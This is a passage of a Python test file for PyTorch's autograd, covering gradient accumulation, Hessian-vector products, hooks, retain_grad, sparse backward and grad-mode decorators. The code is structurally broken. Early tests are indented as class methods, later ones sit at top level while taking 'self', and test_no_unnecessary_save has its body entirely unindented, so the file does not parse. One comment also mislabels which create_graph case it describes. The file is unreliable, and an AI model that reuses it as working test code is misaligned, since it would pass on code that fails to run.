                # if forward AD ends up being implemented for torch.mv, choose a different op
                res = torch.mv(mat, dual_x)
    def test_accumulate_grad(self):
        """Second backward accumulates in-place iff create_graph=False."""
        grad_output = torch.ones(5, 5)
        def compute_grad(create_graph):
            x = torch.randn(5, 5, requires_grad=True)
            y = x + 2
            y.backward(grad_output, retain_graph=True)
            x_grad = x.grad
            x_grad_clone = x.grad.clone()
            y.backward(grad_output, create_graph=create_graph)
            return x_grad, x_grad_clone
        # Accumulate in-place when create_graph is False
        x_grad, x_grad_clone = compute_grad(create_graph=False)
        self.assertEqual(x_grad, x_grad_clone * 2)
        # Accumulate out-of-place when create_graph is False
        x_grad, x_grad_clone = compute_grad(create_graph=True)
        self.assertEqual(x_grad, x_grad_clone)
    def test_accumulate_grad_tensor_reference(self):
        """Check when accumulation preserves the identity of params.grad."""
        def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
            params = torch.tensor([1.5, 1.5]).requires_grad_()
            params.grad = params_grad_tensor
            grad_saved = params.grad
            params.backward(backward_grad_tensor, create_graph=create_graph)
            self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)
        for create_graph in (False, True):
            # Accumulate dense gradient to sparse gradient will change the `params.grad` reference
            _test_grad_tensor(
                torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
                torch.tensor([1.5, 1.5]),
                False,  # never accumulates in-place
                create_graph)
            # Accumulate dense gradient to dense gradient will preserve the `params.grad` reference,
            # but only if create_graph=False.
            _test_grad_tensor(
                torch.tensor([1.5, 1.5]),
                torch.tensor([1.5, 1.5]),
                not create_graph,
                create_graph)
            # Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference,
            # but only if create_graph=False.
            _test_grad_tensor(
                torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
                torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
                not create_graph,
                create_graph)
    def test_accumulate_grad_with_zero_numel_grad(self):
        """Broadcasting a zero-numel tensor still produces well-shaped grads."""
        a = torch.rand(4, 0, requires_grad=True)
        b = torch.rand(4, 1, requires_grad=True)
        c = a + b
        assert c.shape == (4, 0)
        c.sum().backward()
        self.assertEqual(b.grad, torch.zeros(4, 1))
        self.assertEqual(a.grad, torch.zeros(4, 0))
    def test_hessian_vector(self):
        """Hessian-vector product via double backward accumulates into .grad."""
        x = torch.randn(2, 2, requires_grad=True)
        y = torch.randn(2, 2, requires_grad=True)
        z = x ** 2 + y * x + y ** 2
        z.backward(torch.ones(2, 2), create_graph=True)
        with torch.no_grad():
            x_grad = 2 * x + y
            y_grad = x + 2 * y
        self.assertEqual(x.grad, x_grad)
        self.assertEqual(y.grad, y_grad)
        grad_sum = 2 * x.grad + y.grad
        grad_sum.backward(torch.ones(2, 2))
        # Second backward adds the HVP on top of the first-order grads.
        x_hv = torch.ones(2, 2) * 5
        y_hv = torch.ones(2, 2) * 4
        self.assertEqual(x.grad, x_grad + x_hv)
        self.assertEqual(y.grad, y_grad + y_hv)
    def test_grad(self):
        """torch.autograd.grad computes HVPs without touching .grad, and
        rejects grad_outputs whose shape mismatches the output."""
        x = torch.randn(2, 2, requires_grad=True)
        y = torch.randn(2, 2, requires_grad=True)
        z = x ** 2 + y * x + y ** 2
        z.backward(torch.ones(2, 2), create_graph=True)
        x_grad = 2 * x + y
        y_grad = x + 2 * y
        self.assertEqual(x.grad, x_grad)
        self.assertEqual(y.grad, y_grad)
        grad_sum = 2 * x.grad + y.grad
        x_hv = torch.autograd.grad(
            outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
            inputs=[x], create_graph=True)
        expected_x_hv = torch.ones(2, 2) * 5
        expected_y_hv = torch.ones(2, 2) * 4
        self.assertEqual(x_hv[0], expected_x_hv)
        # .grad must be untouched by torch.autograd.grad.
        self.assertEqual(x.grad, x_grad)
        self.assertEqual(y.grad, y_grad)
        # Test that grad_outputs and outputs have the same shape
        grad_out = torch.ones(2)
        try:
            torch.autograd.grad(
                outputs=[grad_sum], grad_outputs=[grad_out],
                inputs=[x], create_graph=True)
            self.assertFail()
        except RuntimeError as error:
            self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
                             + str(grad_out.shape) + " and output[0] has a shape of "
                             + str(grad_sum.shape) + ".")
    def test_grad_nonleaf(self):
        """Gradient-ascent loop via torch.autograd.grad on non-leaf tensors:
        .grad stays None until an explicit backward()."""
        x_init = torch.randn(2, 2, requires_grad=True)
        x = x_init
        y = torch.randn(2, 2, requires_grad=True)
        grad_output = torch.ones(2, 2)
        def fn(x):
            return x ** 2 + y * x + y ** 2
        for _ in range(5):
            grad_x, = torch.autograd.grad(
                fn(x), x, grad_outputs=grad_output, create_graph=True)
            grad_x_expected = 2 * x + y
            self.assertIsNone(y.grad)
            self.assertIsNone(x.grad)
            self.assertEqual(grad_x, grad_x_expected)
            x = x + 0.05 * grad_x
        val_init = fn(x_init).sum()
        val_final = fn(x).sum()
        # Ascent along the gradient must increase the value.
        self.assertGreater(val_final, val_init)
        x.backward(grad_output)
        self.assertIsNotNone(y.grad)
        self.assertIsNotNone(x_init.grad)
    def test_grad_nonleaf_many_outputs(self):
        """torch.autograd.grad on two chunks of one tensor must not fire the
        parent's hook nor populate its .grad."""
        # This checks an edge case for function callbacks
        # We want to capture two grads of a function, but can only
        # register a single callback.
        x = torch.randn(4, 2, requires_grad=True)
        a, b = x.chunk(2)
        def hook(*grads):
            hook_called[0] = True
        hook_called = [False]
        x.register_hook(hook)
        go = torch.randn(2, 2)
        grad_a, grad_b = torch.autograd.grad(
            (a + 2 * b), [a, b], grad_outputs=go, create_graph=True)
        self.assertEqual(grad_a, go)
        self.assertEqual(grad_b, go * 2)
        self.assertFalse(hook_called[0])
        self.assertIsNone(x.grad)
    def test_grad_nonleaf_register_hook(self):
        """A hook on one unbind() output fires only for that output's backward."""
        # This checks an edge case for register_hook.
        # We want to capture grad of a nonleaf tensor,
        # but avoid segfault during backward of other nonleaf tensors
        x = torch.randn(5, requires_grad=True)
        x_list = x.unbind()
        x0 = x_list[0]
        hook_results = [None]
        def hook(grad):
            hook_results[0] = grad
        x0.register_hook(hook)
        x_list[0].backward()
        self.assertEqual(hook_results[0], torch.tensor(1.))
        expected_grad = torch.tensor([1., 0, 0, 0, 0])
        self.assertEqual(x.grad, expected_grad)
        self.assertIsNone(x_list[0].grad)
        for i in range(1, 5, 1):
            x_list[i].backward()
            # Hook registered on x0 must not fire for the other elements.
            self.assertEqual(hook_results[0], None)
            expected_grad[i] = 1.0
            self.assertEqual(x.grad, expected_grad)
            self.assertIsNone(x_list[i].grad)
    def test_hook_with_no_name(self):
        """register_hook accepts callables without a __name__ attribute."""
        # Create a hook that do not have a __name__ attribute
        class MyHookClass:
            def __call__(self, grad):
                return grad.clone()
        x = torch.randn(5, requires_grad=True).clone()
        x.register_hook(MyHookClass())
        x.sum().backward()
        # Should run fine
    def test_sharded_grad(self):
        """Backward can be split: grad to intermediates in shards, then
        torch.autograd.backward from the intermediates to the leaves."""
        leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
        intermediates = [l * i + l * l for i, l in enumerate(leaves)]
        loss = sum(v * i for i, v in enumerate(intermediates)).sum()
        # define a helper for dividing intermediates into groups
        def group(l, group_size):
            return (l[i:i + group_size] for i in range(0, len(l), group_size))
        # Compute the d loss / d intermediates in chunks of shard_size
        shard_size = 2
        d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
                           for d_i in torch.autograd.grad(loss, intermediates_batch)]
        # Compute rest of backward pass
        torch.autograd.backward(intermediates, d_intermediates)
        for i, l in enumerate(leaves):
            self.assertEqual(l.grad, i * i * (1 + l))
    def test_backward_badcalls(self):
        """backward() on a tensor that doesn't require grad must raise."""
        x = torch.ones(1)
        with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
            x.backward()
    def test_grad_badcalls(self):
        """torch.autograd.grad raises when outputs/inputs don't require grad."""
        x = torch.ones(1)
        y = x ** 2
        with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
            torch.autograd.grad(x, y)
        with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
            torch.autograd.grad(y, x)
        x = torch.ones(1, requires_grad=True)
        y = x ** 2
        torch.autograd.grad(y, x)  # this should succeed now
def test_grad_empty_inputs(self):
    """Passing an empty `inputs` list to autograd.grad is an error."""
    leaf = torch.tensor([1.0], requires_grad=True)
    with self.assertRaisesRegex(ValueError, "grad requires non-empty inputs."):
        torch.autograd.grad(2 * leaf, [], grad_outputs=torch.tensor([1.0]))
def test_grad_fn_badcalls(self):
    """Calling a grad_fn with the wrong arity must raise a TypeError."""
    arity_error = 'expected .* arguments, got .* instead'
    inp = torch.ones(1, requires_grad=True)
    out = inp ** 2
    with self.assertRaisesRegex(TypeError, arity_error):
        out.grad_fn(inp.detach(), inp.detach())  # one argument too many
    with self.assertRaisesRegex(TypeError, arity_error):
        out.grad_fn()  # one argument too few
    out.grad_fn(inp.detach())  # exactly one argument: fine
def test_grad_unreachable(self):
    """allow_unused=True yields None for inputs the output does not reach."""
    a = torch.ones(1, requires_grad=True)
    b = torch.ones(1, requires_grad=True)
    # Touch both leaves so their grad accumulators get allocated.
    keep_a = a * 2
    keep_b = b * 2

    ga, gb = torch.autograd.grad(a * 2, [a, b], allow_unused=True)
    self.assertEqual(ga, a * 2)
    self.assertIsNone(gb)

    # Slightly different case: `c` never even had a grad accumulator
    # allocated, yet must still come back as None.
    c = torch.ones(1, requires_grad=True)
    ga, gc = torch.autograd.grad(a * 2, [a, c], allow_unused=True)
    self.assertEqual(ga, a * 2)
    self.assertIsNone(gc)

    # allow_unused=False turns the unreachable input into an error.
    with self.assertRaisesRegex(RuntimeError,
                                "Set allow_unused=True"):
        ga, gb = torch.autograd.grad(a * 2, [a, b], allow_unused=False)
def test_grad_unreachable_discovery(self):
    # Test that certain nodes are not erroneously executed when an input
    # is unreachable. See #39784
    class MyFunc(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            return x

        @staticmethod
        def backward(ctx, x):
            # Only runs if autograd wrongly schedules this node.
            self.fail("This node should not be executed!")

    # `y` is not part of `x`'s graph at all: MyFunc.backward must not run.
    x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
    y = torch.randn(1, requires_grad=True)
    (gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
    self.assertIsNone(gY)

    # Mixed case: `z` is reachable, `y` still is not.
    x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
    y = torch.randn(1, requires_grad=True)
    z = torch.randn(1, requires_grad=True)
    (gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
    self.assertIsNone(gY)
    self.assertIsNotNone(gZ)

    # Same via backward(inputs=...), which tolerates unused inputs.
    x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
    y = torch.randn(1, requires_grad=True)
    torch.autograd.backward(x, inputs=(y, ))  # allow_unused is implicitly True!
    self.assertIsNone(y.grad)
def test_grad_batched_grad(self):
    # is_grads_batched=True: the leading dimension of each grad_output is
    # treated as a batch of independent VJP computations.
    x = torch.randn(2, 2, requires_grad=True)

    out = x.clone()  # Size([2, 2])
    batched_grad = torch.arange(3).expand(2, 2, 3).transpose(0, 2)  # Size([3, 2, 2])
    grad, = torch.autograd.grad(out, (x,), (batched_grad,), is_grads_batched=True)
    # clone() is the identity for grads: each batch element's grad equals
    # its grad_output.
    self.assertEqual(grad, torch.arange(3).expand(2, 2, 3).transpose(0, 2).to(dtype=grad.dtype))

    # Detect shape mismatch
    grad_out = torch.ones(2, 2)
    with self.assertRaisesRegex(RuntimeError, "If `is_grads_batched=True`, we interpret the first"):
        torch.autograd.grad(outputs=out, grad_outputs=(grad_out,), inputs=(x,), is_grads_batched=True)

    # Scalar outputs
    out = x.sum()  # Size([])
    batched_grad = torch.arange(3)  # Size([3])
    grad, = torch.autograd.grad(out, (x,), (batched_grad,), is_grads_batched=True)
    self.assertEqual(grad, torch.arange(3).expand(2, 2, 3).transpose(0, 2).to(dtype=grad.dtype))

    # We consider scalar and sized-1 to be a mismatch. This is consistent with current non-batched behavior.
    grad_out = torch.ones(2).unsqueeze(1)
    with self.assertRaisesRegex(RuntimeError, "If `is_grads_batched=True`, we interpret the first"):
        torch.autograd.grad(outputs=out, grad_outputs=(grad_out,), inputs=(x,), is_grads_batched=True)
def test_hooks(self):
    # Exercises hook registration, stacking, removal, and grad rewriting.
    x = torch.ones(5, 5, requires_grad=True)
    y = torch.ones(5, 5) * 4
    y.requires_grad_(True)

    # counter[0] is bumped by `inc` every time a hook fires.
    counter = [0]

    def bw_hook(inc, grad):
        self.assertIsInstance(grad, torch.Tensor)
        counter[0] += inc

    z = x ** 2 + x * 2 + x * y + y
    # Hook on the leaf contributes 0; hook on z contributes 1 per backward.
    x.register_hook(lambda *args: bw_hook(0, *args))
    test = z.register_hook(lambda *args: bw_hook(1, *args))
    z.backward(torch.ones(5, 5), retain_graph=True)
    self.assertEqual(counter[0], 1)

    # Second hook on z: both fire, adding 1 + 2 = 3 on top of 1.
    test2 = z.register_hook(lambda *args: bw_hook(2, *args))
    z.backward(torch.ones(5, 5), retain_graph=True)
    self.assertEqual(counter[0], 4)

    # After removal only the first z-hook remains (+1).
    test2.remove()
    z.backward(torch.ones(5, 5), retain_graph=True)
    self.assertEqual(counter[0], 5)

    def bw_hook_modify(grad):
        # A hook's return value replaces the gradient that flows on.
        return grad.mul(2)

    test.remove()
    z.register_hook(bw_hook_modify)
    with torch.no_grad():
        y.grad.zero_()
    z.backward(torch.ones(5, 5), retain_graph=True)
    # dz/dy = x + 1, doubled by the modifying hook on z.
    self.assertEqual(y.grad, (x + 1) * 2)

    # A second modifying hook on y doubles it again: (x + 1) * 4.
    y.register_hook(bw_hook_modify)
    with torch.no_grad():
        y.grad.zero_()
    z.backward(torch.ones(5, 5))
    self.assertEqual(y.grad, (x + 1) * 4)
def test_hooks_cpp(self):
    """Tensor hooks must also fire for autograd functions implemented in C++."""
    bn = torch.nn.BatchNorm1d(5, affine=False)
    bn.double()
    bn.eval()

    calls = [0]

    def doubling_hook(grad):
        # Count invocations and double the gradient flowing through.
        calls[0] += 1
        return grad * 2

    inp = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
    out = bn(inp)
    out.register_hook(doubling_hook)
    out.sum().backward()

    self.assertEqual(calls[0], 1, msg='bw_hook not called')
    # In eval mode with no affine params the grad of sum(bn(x)) is ones,
    # doubled by the hook.
    self.assertEqual(inp.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
def test_hook_none(self):
    # WARNING: this is a test for autograd internals.
    # You should never have to use such things in your code.
    class NoneGradientFunction(Function):
        @staticmethod
        def forward(ctx, x, y):
            assert ctx.needs_input_grad[0]
            assert not ctx.needs_input_grad[1]
            return x, y

        @staticmethod
        def backward(ctx, grad_x, grad_y):
            # y gets no gradient; hooks below must still only ever
            # observe non-None grads.
            return grad_x, None

    was_called = [False]

    def hook(grad):
        self.assertIsNotNone(grad)
        was_called[0] = True

    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5)
    rx, ry = NoneGradientFunction.apply(x, y)
    rx.register_hook(hook)
    ry.register_hook(hook)
    # NOTE(review): this is the builtin sum(), iterating rx's rows with ry
    # as the start value -- presumably intentional as a cheap way to make
    # both outputs contribute to the loss; it is not torch.sum.
    sum(rx, ry).sum().backward()
    self.assertTrue(was_called[0])
def test_retain_grad(self):
    """retain_grad() makes a non-leaf keep its grad; repeat calls are safe."""
    inp = torch.rand(1, 3, requires_grad=True)
    hidden = inp * 3
    out = (hidden * hidden).sum()

    # Calling retain_grad() more than once must be harmless.
    hidden.retain_grad()
    hidden.retain_grad()

    # Each backward pass accumulates into hidden.grad.
    out.backward(retain_graph=True)
    self.assertEqual(hidden * 2, hidden.grad)
    out.backward(retain_graph=True)
    self.assertEqual(hidden * 4, hidden.grad)

    with torch.no_grad():
        inp.grad.zero_()
    # On a leaf, retain_grad() is a no-op.
    inp.retain_grad()
    inp.retain_grad()
    out.backward()
    self.assertEqual(inp * 18, inp.grad)
def test_retain_grad_cycle(self):
    """retain_grad() must not create a cycle that keeps the tensor alive."""
    leaf = torch.ones(5, 5, requires_grad=True)

    def make_graph():
        mid = leaf * 2
        mid.retain_grad()
        # Return a dependent value plus a weak ref so we can verify
        # that `mid` itself was collected.
        return mid / 2, torch._C._WeakTensorRef(mid)

    out, weak = make_graph()
    self.assertTrue(weak.expired())
    # Backward through the surviving part of the graph must still work.
    out.sum().backward()
def test_backward(self):
    """Spot-check analytic gradients of a small arithmetic expression."""
    v = torch.randn(5, 5, requires_grad=True)
    x = torch.randn(5, 5, requires_grad=True)
    # Offset away from zero so the divisions below stay well conditioned.
    y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
    z = torch.randn(5, 5, requires_grad=True)
    go = torch.randn(5, 5)

    # Backward on a leaf just copies the incoming gradient.
    v.backward(go)
    self.assertEqual(v.grad, go)

    a = x + (y * z) + 4 * z ** 2 * x / y
    a.backward(go)
    # Hand-derived partial derivatives of `a`.
    da_dx = 4 * z.pow(2) / y + 1
    da_dy = z - 4 * x * z.pow(2) / y.pow(2)
    da_dz = 8 * x * z / y + y
    self.assertEqual(x.grad, da_dx * go)
    self.assertEqual(y.grad, da_dy * go)
    self.assertEqual(z.grad, da_dz * go)
def test_sparse_mm_backward(self):
    # mm/addmm with sparse operands support backward only for some operand
    # combinations; unsupported ones must raise informative errors.
    size = (3, 3)
    sparse = torch.sparse_coo_tensor(size, requires_grad=True)
    dense = torch.randn(size, requires_grad=True)

    # addmm requires a strided mat1 for its backward.
    with self.assertRaisesRegex(
            RuntimeError,
            "The backward pass for this operation requires the 'mat1' tensor to be strided,"):
        z = dense.addmm(sparse, dense)

    mm_test_cases = [
        # a requires grad, a is sparse, b requires grad, b is sparse, error message
        (False, True, True, False, None),
        (False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
        (False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
        (True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
        (True, True, False, False, "The backward pass for this operation requires the 'self'"),
        (True, True, True, False, "The backward pass for this operation requires the 'self'"),
        (True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
    ]
    for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
        # We should only be testing cases with sparse inputs, and at least one
        # input needs to require grad so we can call a backward pass
        assert a_is_sparse or b_is_sparse
        assert a_req_grad or b_req_grad

        a = torch.randn(size, requires_grad=a_req_grad)
        if a_is_sparse:
            a = a.to_sparse()
        b = torch.randn(size, requires_grad=b_req_grad)
        if b_is_sparse:
            b = b.to_sparse()

        # If no error expected, check that sparse and dense cases match
        if err_msg is None:
            r = a.mm(b)
            r.sum().backward()
            a_grad = None if a.grad is None else a.grad.clone().detach()
            b_grad = None if b.grad is None else b.grad.clone().detach()

            # Redo with only dense tensors
            a = (a.to_dense() if a.is_sparse else a).clone().detach()
            a.requires_grad = a_req_grad
            b = (b.to_dense() if b.is_sparse else b).clone().detach()
            b.requires_grad = b_req_grad
            r = a.mm(b)
            r.sum().backward()
            # Sparse and dense paths must agree on the gradients.
            self.assertEqual(a_grad, a.grad)
            self.assertEqual(b_grad, b.grad)
        else:
            with self.assertRaisesRegex(RuntimeError, err_msg):
                a.mm(b)
def test_multi_backward(self):
    """backward() over several roots accumulates gradients from all of them."""
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5, requires_grad=True)
    q = torch.randn(5, 5, requires_grad=True)
    a = torch.randn(5, 5, requires_grad=True)
    b = torch.randn(5, 5, requires_grad=True)

    q2 = q * 2
    z = x + y + q2
    c = a * b + q2
    gz = torch.randn(5, 5)
    gc = torch.randn(5, 5)
    torch.autograd.backward([z, c], [gz, gc])

    self.assertEqual(x.grad, gz)
    self.assertEqual(y.grad, gz)
    self.assertEqual(a.grad, gc * b)
    self.assertEqual(b.grad, gc * a)
    # q feeds both roots through q2, so its grad sums both contributions.
    self.assertEqual(q.grad, (gc + gz) * 2)
def test_multi_backward_no_grad(self):
    """A root with requires_grad=False and no grad_fn is rejected by backward."""
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5, requires_grad=False)

    z = x + y
    q = y * 2

    # NB: we currently raise an exception if any arguments to backwards
    # have requires_grad=False and don't have a grad_fn. We may want to
    # relax that check to a warning.
    self.assertRaises(
        RuntimeError,
        lambda: torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)]))
def test_backward_with_inputs(self):
    # `inputs=` restricts gradient accumulation to the listed tensors.
    x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)

    def fn():
        # Build a fresh graph for each backward call below.
        return x ** 2 + y * x + y ** 2

    gradient = torch.ones(2, 2)
    x_grad_expected = 2 * x + y
    y_grad_expected = x + 2 * y

    @torch.no_grad()
    def reset_grad():
        x.grad.zero_()
        y.grad.zero_()

    torch.autograd.backward(fn(), gradient, inputs=[x, y])
    self.assertEqual(x.grad, x_grad_expected)
    self.assertEqual(y.grad, y_grad_expected)

    # Only x listed: y's grad stays at the zeroed value.
    reset_grad()
    torch.autograd.backward(fn(), gradient, inputs=[x])
    self.assertEqual(x.grad, x_grad_expected)
    self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)

    reset_grad()
    torch.autograd.backward(fn(), gradient, inputs=[y])
    self.assertEqual(y.grad, y_grad_expected)
    self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)

    # A bare tensor (not wrapped in a list) is accepted for inputs= too.
    reset_grad()
    torch.autograd.backward(fn(), gradient, inputs=y)
    self.assertEqual(y.grad, y_grad_expected)
    self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)

    reset_grad()
    self.assertRaisesRegex(RuntimeError, 'cannot be empty',
                           lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
    # `inputs=` may include non-leaf tensors; their .grad is populated too.
    x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    x_nonleaf = x * 1
    y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)

    out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2

    out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])
    x_grad_expected = 2 * x + y
    y_grad_expected = x + 2 * y
    x_non_leaf_expected = 2 * x_nonleaf + y

    self.assertEqual(y.grad, y_grad_expected)
    self.assertEqual(x.grad, x_grad_expected)
    self.assertEqual(x_nonleaf.grad, x_non_leaf_expected)

    # backward doesn't have an allow_unused flag, so the behavior of backward
    # when variable is not part of the graph is as if allow_unused were true:
    # z.grad will simply be None.
    out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
    self.assertIsNone(z.grad)
def test_dependent_backward(self):
    """Roots that depend on one another still produce correctly summed grads."""
    x = torch.randn(10, requires_grad=True)
    y = x ** 2
    z = y ** 3  # z == x ** 6, so dz/dx = 6 * x^5
    gy = torch.randn(10)
    gz = torch.randn(10)
    torch.autograd.backward([y, z], [gy, gz])
    # Contributions from both roots accumulate on x.
    self.assertEqual(x.grad, 2 * x * gy + 6 * x.pow(5) * gz)
def test_save_output_nr(self):
    # output_nr records which output of a multi-output Function a tensor
    # is; it must survive a save_for_backward / saved_tensors round-trip.
    x = torch.randn(10, requires_grad=True)

    class MultiOutputFn(Function):
        @staticmethod
        def forward(ctx, x):
            return x[:5], x[5:]

        @staticmethod
        def backward(ctx, *grad):
            return torch.cat(grad)

    a, b = MultiOutputFn.apply(x)
    # b is the second output of MultiOutputFn.
    self.assertEqual(b.output_nr, 1)

    class TestFn(Function):
        @staticmethod
        def forward(ctx, b):
            ctx.save_for_backward(b)
            return b * 2

        @staticmethod
        def backward(ctx, grad_b):
            # The real check: output_nr survives the saved-tensors round
            # trip. Runs during the .backward() call below.
            b, = ctx.saved_tensors
            self.assertEqual(b.output_nr, 1)

    TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
    """Freeing a very deep chain graph must not overflow the C stack."""
    def build_and_drop():
        x = torch.randn(1, requires_grad=True)
        y = x.clone()
        # Build a 150k-node "chain" graph: y <- y + y * eps <- ...
        for _ in range(150000):
            y = y + y * 0.000001
        # Graph deletion happens when these locals go out of scope;
        # that deallocation is what must not recurse deeply.

    # Should not stack overflow.
    build_and_drop()
def test_free_deep_graph_complicated(self):
    """Freeing a deep graph with skip connections must not overflow the stack.

    The previous version had two latent bugs that silently disabled the
    "skip connection" branch, so only a plain chain was ever built:
      * ``prev_values[:-1]`` could hold at most one tensor, so the
        ``nprev == 2`` branch was unreachable, and
      * ``randchoice[depth]`` indexes one past the end of ``randchoice``
        and would have raised had the branch ever been taken.
    Both are fixed below so the test exercises the graph shape it claims to.
    """
    def build_and_drop():
        depth = 100000
        randchoice = torch.randint(2, [depth, 2])
        x = torch.randn(1, requires_grad=True)
        y = x.clone()
        # Hold the two previous values (out-of-place updates below keep
        # the held tensors' values intact).
        prev_values = [None, None]
        # Build a "chain with skip connections" graph
        for step in range(depth):
            prev_tensors = [tensor for tensor in prev_values
                            if tensor is not None]
            prev_values.append(y)
            prev_values.pop(0)
            # Definitely pick one tensor to add
            y = y + y * 0.000001
            # Possibly add other tensors (skip connections)
            if len(prev_tensors) == 2:
                y = y + randchoice[step].mul(torch.cat(prev_tensors)).sum()
        # graph deletion occurs when the above locals go out of scope.

    # Should not stack overflow
    build_and_drop()
def test_free_deep_graph_pyfunction(self):
    """Freeing a deep graph of Python Functions must not overflow the stack."""
    class AddOp(Function):
        @staticmethod
        def forward(ctx, lhs, rhs):
            return lhs + rhs

        @staticmethod
        def backward(ctx, grad_output):
            return grad_output, grad_output

    def build_and_drop():
        x = torch.randn(1, requires_grad=True)
        y = x.clone()
        # 150k nested applications of a Python autograd Function.
        for _ in range(150000):
            y = AddOp.apply(y, y)
        # Graph deletion happens when the locals die; it must not
        # recurse deeply.

    # Should not stack overflow.
    build_and_drop()
def test_no_unnecessary_save(self):
# If we kept x in the derivative Function of x * 2 we would
# get an error in the backward that would complain that we've
# modified x, which was needed for gradient computation.
# Since we should elide unnecessary saves, this test should pass.
mu = torch.ones(1, requires_grad=True)
x = torch.empty(1)
loss = 0
for i in range(3):
x.detach_()
x.copy_(mu + i)
ft = torch.tensor([float(i)])
multiplied = x * ft
s = multiplied.sum()
loss += s
loss.backward()
def test_no_grad(self):
    # torch.no_grad as a context manager and as a decorator must both
    # produce results detached from the graph.
    x = torch.ones(5, 5, requires_grad=True)
    y = torch.ones(5, 5) * 4
    with torch.no_grad():
        w = x + y

    @torch.no_grad()
    def adder(x, y):
        return x + y

    z = adder(x, y)

    # Results have no grad flag, no grad_fn, and cannot be backpropped.
    self.assertFalse(w.requires_grad)
    self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
    self.assertIsNone(w.grad_fn)
    self.assertFalse(z.requires_grad)
    self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
    self.assertIsNone(z.grad_fn)

    # test nested decorator and with-statement on no_grad
    with torch.no_grad():
        self.assertFalse(torch.is_grad_enabled())
        w = adder(x, y)
        # Exiting the decorator restores the outer (still-disabled) mode.
        self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
    """Grad-mode decorators apply inside generator bodies, not in callers."""
    @torch.no_grad()
    def gen_no_grad():
        for i in range(10):
            self.assertFalse(torch.is_grad_enabled())
            yield i

    # The generator body runs with grad off while the consuming loop
    # keeps grad on.
    with torch.enable_grad():
        for _ in gen_no_grad():
            self.assertTrue(torch.is_grad_enabled())

    @torch.enable_grad()
    def gen_enable_grad():
        for i in range(10):
            self.assertTrue(torch.is_grad_enabled())
            yield i

    # And the symmetric case.
    with torch.no_grad():
        for _ in gen_enable_grad():
            self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions_recursive(self):
    # enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
    # recursively, to ensure that the decorators preserve the caller's setting
    @torch.enable_grad()
    def enable_grad_decorator_recursive(depth):
        self.assertTrue(torch.is_grad_enabled())
        if depth > 0:
            no_grad_decorator_recursive(depth - 1)
            # Mode must be restored after the nested call returns.
            self.assertTrue(torch.is_grad_enabled())

    @torch.no_grad()
    def no_grad_decorator_recursive(depth):
        self.assertFalse(torch.is_grad_enabled())
        if depth > 0:
            enable_grad_decorator_recursive(depth - 1)
            self.assertFalse(torch.is_grad_enabled())

    # enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
    # each other recursively, to ensure that the decorators preserve the caller's setting
    def enable_grad_context_manager_recursive(depth):
        with torch.enable_grad():
            self.assertTrue(torch.is_grad_enabled())
            if depth > 0:
                no_grad_context_manager_recursive(depth - 1)
                self.assertTrue(torch.is_grad_enabled())

    def no_grad_context_manager_recursive(depth):
        with torch.no_grad():
            self.assertFalse(torch.is_grad_enabled())
            if depth > 0:
                enable_grad_context_manager_recursive(depth - 1)
                self.assertFalse(torch.is_grad_enabled())

    # Run both recursion styles from each outer mode; the outer mode
    # must survive unchanged in every case.
    with torch.enable_grad():
        self.assertTrue(torch.is_grad_enabled())
        enable_grad_decorator_recursive(10)
        self.assertTrue(torch.is_grad_enabled())
        enable_grad_context_manager_recursive(10)
        self.assertTrue(torch.is_grad_enabled())

    with torch.no_grad():
        self.assertFalse(torch.is_grad_enabled())
        enable_grad_decorator_recursive(10)
        self.assertFalse(torch.is_grad_enabled())
